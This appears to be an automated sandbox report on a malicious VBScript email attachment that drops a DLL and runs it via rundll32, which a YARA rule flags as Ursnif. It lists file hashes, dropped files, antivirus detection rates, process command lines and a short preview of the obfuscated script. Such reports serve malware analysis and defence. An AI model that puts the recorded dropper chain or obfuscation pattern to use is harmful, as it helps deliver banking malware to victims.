        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:26
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal92.troj.evad.winVBS@5/8@0/0
        EGA Information:Failed
        HDC Information:
        • Successful, ratio: 13.2% (good quality ratio 12.6%)
        • Quality average: 79.3%
        • Quality standard deviation: 28.1%
        HCA Information:
        • Successful, ratio: 58%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .vbs
        Warnings:
        Show All
        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.

        Simulations

        Behavior and APIs

        TimeTypeDescription
        11:45:04API Interceptor1x Sleep call for process: wscript.exe modified

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
        C:\Users\user\AppData\Local\Temp\Rabin.dmgdocumentation_07531.vbsGet hashmaliciousBrowse
          documentation_27396.vbsGet hashmaliciousBrowse
            info_70397.vbsGet hashmaliciousBrowse

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\Brewster.m4
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):31
              Entropy (8bit):4.3893648586343925
              Encrypted:false
              SSDEEP:3:jRU/8UElCKe:iEUK8
              MD5:7D9E8C8A31E5DB74A019F387558C2FD7
              SHA1:9F8F21F043CB5CC1B5002F82A3CCD1083074B037
              SHA-256:BF886F8F2A23CF7B8A25DF52438692C14D022409F1D930286ABA34528D64A608
              SHA-512:A076D94E35DD074175A4F48591F7019AE2D71A0A38D56D26A4534758ECECE7E0737F7150950C32DC9B41748CCA31586559FEAA92C3948B9FD45B6C093AC44E33
              Malicious:false
              Reputation:low
              Preview: IgVZEJelgrVSfRAmJyAqahtJlgbdyun
              C:\Users\user\AppData\Local\Temp\Rabin.dmg
              Process:C:\Windows\System32\wscript.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):463360
              Entropy (8bit):6.845616079385091
              Encrypted:false
              SSDEEP:12288:OycGIk5DHw+cppnabV/1XsiXhIbK7boMXBiu7ivtv6g:OycGIPObV/18iVboQWv6
              MD5:B1FC7DC75445A016588402757FDD6FF6
              SHA1:12AA8A932E6711BECA796F67E717523D6794DE9E
              SHA-256:94EB81BC58ADB976F21344D3EB273C9EB833AFBCADD121EB2AD38F1EF07A1F85
              SHA-512:5EA1A7E0D938ED772AB59C486CA6D018814082E50BD000AAFAFD43929983244875792C958A4BDA8B12EDEA1888392C98C33BB26D2D3AFB1A037E1074B6ED9675
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 51%, Browse
              • Antivirus: Metadefender, Detection: 25%, Browse
              • Antivirus: ReversingLabs, Detection: 72%
              Joe Sandbox View:
              • Filename: documentation_07531.vbs, Detection: malicious, Browse
              • Filename: documentation_27396.vbs, Detection: malicious, Browse
              • Filename: info_70397.vbs, Detection: malicious, Browse
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....T@`...........!.................?....................................................@.............................\...L...P...............................@...4...T...............................@...............h............................text...L........................... ..`.rdata..j%.......&..................@..@.data...p...........................@....rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\adobe.url
              Process:C:\Windows\System32\wscript.exe
              File Type:MS Windows 95 Internet shortcut text (URL=<https://adobe.com/>), ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):108
              Entropy (8bit):4.699454908123665
              Encrypted:false
              SSDEEP:3:J25YdimVVG/VClAWPUyxAbABGQEZapfpgtovn:J254vVG/4xPpuFJQxHvn
              MD5:99D9EE4F5137B94435D9BF49726E3D7B
              SHA1:4AE65CB58C311B5D5D963334F1C30B0BD84AFC03
              SHA-256:F5BC6CF90B739E9C70B6EA13F5445B270D8F5906E199270E22A2F685D989211E
              SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
              C:\Users\user\AppData\Local\Temp\alleyway.xlsx
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):80
              Entropy (8bit):5.163574463632383
              Encrypted:false
              SSDEEP:3:3s9Lk3Z0yVQKd7OD9BBYh5u0y2WTH:3cLk3Z0slGcy2U
              MD5:77EC729601A3992F484FACC6097DEE11
              SHA1:417311EE6DC848D66E47B8E68B8F9C532AC5C79F
              SHA-256:E0E14AAFC65AF3F390D75AFF8C88FBDF7A0BF133E9F12D17E5711F4045A5C9D5
              SHA-512:F021B44ED6762993538BE2EBA289D5774CBF9CB169459CD09064898D86005C14C69A06AAD5D21CEDC81DAA779154EB912E8EB82B9245763E5F5E2C05C8653650
              Malicious:false
              Reputation:low
              Preview: FAAkBTAIhXOUAMoireRLaHxWbPUlZalWstcYxWZvVPERfYbaTQdffXmYZltOOiDpvxWUqvHGWgEostPb
              C:\Users\user\AppData\Local\Temp\assai.zip
              Process:C:\Windows\System32\wscript.exe
              File Type:Zip archive data, at least v2.0 to extract
              Category:dropped
              Size (bytes):320012
              Entropy (8bit):7.998324397637329
              Encrypted:true
              SSDEEP:6144:DjW4WXZnaeeoYkxXTNShIvZwxpMbL0dUgkiZRQ1gmW5bhCvKZSag:waebhNGew0AdcuRQpubgSZq
              MD5:2E2BF9A0EB9139B28F959A6F17BD939B
              SHA1:BBF80A40979FF77ADB4B73DECEF9330B739BB90F
              SHA-256:8D621174B93D66DF438F8D377D2147CF578F16949E12F1E10BA34A77385D5A7E
              SHA-512:AE1F1A6084196CE0D7DA9776E8A10131BE63B7607E06EFCBD463E0D943622933BD57A74588155AB35202B1D2814C6D737D4D19EC0A8CF287BCE16A5CAEF943F9
              Malicious:true
              Reputation:low
              Preview: PK..........oR...0............Rabin.dmg..TSM..|........RD.........".@ .B .!....]....RTzS....w}.P.Qib..{..)..>..............3...3.....M... ..O(D.r........*Z.*.y......-3..)LmFB\tBx.vD8....&....tm.]..g.vl\$i........3.xJ. ....b.......*S.j..y".>.......-..U...D.YQ..'rK.%...1..Z.....>z:e.....%........!.H...D...d.....k..?...I.....g..X..*..!H....h#.a~Bd8+.A..%0...z.?......!.......l@....\...fB.._...m.._...O ....v..d*....r..3......+.S....P....u...nt..X...7..-#....@R`e+.d^..7.........j..y..XYP...3.}.cF....I.{..Jd_Uu.....E..,..._!.,E......A.9H7I`..@.......2....P.A...j...##1Z,.S)OIGp_(../w.J.*...>...E6(2M..$..._\....<9..$.....w....A.|O.2_"....9 dM....n..g+...q$.p.>O..[....2...-...>.S.W.....M..B......F.....?X...v......!:r...Nm<..P}.*.3..wW.....WY.x.-Ab.P.......jBu6ZN.EV.";......`.7P....k...D3/k..cA......*..~.?..E.......w...}.e...M..n.G...:..&.M8...<?.F.#.u..2..B.C9...xb..T.....BD.......,....gN..._..b.{.._...'....>....E......>Kg..*.2.)..g\.H.7.../...3.*...[._
              C:\Users\user\AppData\Local\Temp\hoydenish.org
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):52
              Entropy (8bit):4.8637132757501895
              Encrypted:false
              SSDEEP:3:vtWa/9HxtBzIZiK5joL1Mn:4a/9HaZimoZM
              MD5:178F2DF82EACC4BFB097B53800DD1375
              SHA1:5111F35F8111DF87B683550680FA04B212BEA51C
              SHA-256:2107126604B4344372E6F55EC1C5236390D69CD244AD4E1D4EDB8897EB3CC80F
              SHA-512:463289625A13052368207D93EC8F022BE92306C90F81CAE3B7410EF8248379AB3174728C6B74B2B8ADC546FACD869179AF380F55A75C340AC4E93AB3E542EC03
              Malicious:false
              Reputation:low
              Preview: CSESLsOohjfXcRaNVoRPbbBTVdxxLlXEhmACpoKBizFzenfLTOLT
              C:\Users\user\AppData\Local\Temp\lowboy.less
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):85
              Entropy (8bit):5.209234836510117
              Encrypted:false
              SSDEEP:3:3ccqAlDsLLHwwgvemfXKrhhHEXVn:3zlDsLLH/nHgVn
              MD5:1D15F444BCF2648DC0721083FFF8D015
              SHA1:58FEB5CFC3AF7DC5BAA8E59737E7FF06953AE6F2
              SHA-256:D5E8F55D13488EC247B6AA3DF73F58FDEB8B7B088ED880C1C4731DB360F76C29
              SHA-512:F1BA33F7F86692DAA5CAC7D012ACBB93FF8DFE581C42966D5BCACC94CADE98B82822476FC83AEE1AFF4FDCB93040CDBE55DC5987A4A2812EE6EEB521B7BB27E1
              Malicious:false
              Preview: xxRVgMoqKLNVcBafHUHjptDNknCInDxSEsRqLjuRcKmKaopdGWZzmuqNAboAxpobTjFJlipLqDnVvOPbcGxbp
              C:\Users\user\AppData\Local\Temp\technic.deb
              Process:C:\Windows\System32\wscript.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):32
              Entropy (8bit):4.288909765557392
              Encrypted:false
              SSDEEP:3:Y2HsiH2LrKo:YpVT
              MD5:F06DAE621E9DB556BF77FE26AEE12EE6
              SHA1:6F4F0CF969553AD4F74560B622AD500E62964B75
              SHA-256:191D824852449377B2AF1880BB10BB9E3A2AC22113A1A4BA7CEF068432E3EF76
              SHA-512:4974C197CD4D628D7C87A93C1B9CB88E4D0746C37293E8BE0054198EBE08ED6188EBB040EC549CE22D82E1BC74C03EEB57EC222746B7BBB4A43ECCE7B6CC785E
              Malicious:false
              Preview: XfkDGDNSNCzbIzkpbUQtSiozaaTEjbKb

              Static File Info

              General

              File type:ASCII text, with very long lines, with CRLF line terminators
              Entropy (8bit):4.127338439609775
              TrID:
                File name:Attachment_32954.vbs
                File size:1444626
                MD5:39eb3427fd329de93a19190d84273710
                SHA1:5d9009503b3500c0b6d35e272dd9160e9d873e46
                SHA256:adf9ca509037dc8ae4090fa9fa92c8eee621a9860a00da566b25643aa8689799
                SHA512:37f66cd5752fa5693c8132c9bfdc0c4df05c0a8a5fe5cf9ae686b848e1196b03fbbad52babfe2c10fb2a9ba7648748883a1727fa0f79ceb0906ec6283a1366ce
                SSDEEP:24576:yc/AM+84+NfRAwmcxvZ1RWB87cZ24PX/Hh/MEUUG1AXlvU2LDkhq5o8CqE:yc/v+84+NfRAwmcxvZ1RWB87cZ24PX/u
                File Content Preview:REM Etruria intemperate rage Berra gusty Angelo townsman Howell Muzak whether bespeak ..const prey = 11..const met = 33..fixate = Array(88,83,prey,capital,expatriate,8,8,8,harden,8,169,171,119,90,138,170,247,56,146,230,capital,8,8,retch,parkway,8,fiesta,8

                File Icon

                Icon Hash:e8d69ece869a9ec4

                Network Behavior

                No network behavior found

                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:11:43:59
                Start date:09/04/2021
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Attachment_32954.vbs'
                Imagebase:0x7ff7b3850000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:45:04
                Start date:09/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
                Imagebase:0x7ff6a5f60000
                File size:69632 bytes
                MD5 hash:73C519F050C20580F8A62C849D49215A
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:11:45:04
                Start date:09/04/2021
                Path:C:\Windows\SysWOW64\rundll32.exe
                Wow64 process (32bit):true
                Commandline:'C:\Windows\System32\rundll32.exe' C:\Users\user\AppData\Local\Temp\Rabin.dmg,DllRegisterServer
                Imagebase:0xfc0000
                File size:61952 bytes
                MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000014.00000003.404725066.0000000000BC0000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >